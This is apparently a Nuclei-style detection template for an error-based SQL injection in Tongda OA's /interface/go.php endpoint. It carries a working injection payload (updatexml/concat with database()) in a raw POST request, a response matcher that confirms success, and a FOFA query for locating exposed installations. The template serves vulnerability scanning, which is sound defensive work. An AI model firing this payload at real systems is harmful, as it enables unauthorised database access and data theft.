http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 'XPATH syntax error:'
            - interface/go.php
      raw:
        - |
          POST /interface/go.php HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          APP_UNIT=1%2527or updatexml(1,concat(0x2a, database()),1) and%25271%2527=%25271
id: tongda-oa-go-php-sqli
info:
    author: Co5mos
    description: |
        通达OA 的 `/interface/go.php` 接口存在报错注入漏洞，攻击者可以利用该漏洞执行任意SQL语句，从而获取数据库中的敏感信息或控制数据库服务器。
    metadata:
        fofa-query: app="TDXK-通达OA"
    name: Tongda OA go.php SQL Injection
    severity: critical
    tags:
        - tongda
        - 通达oa
        - TDXK-通达OA
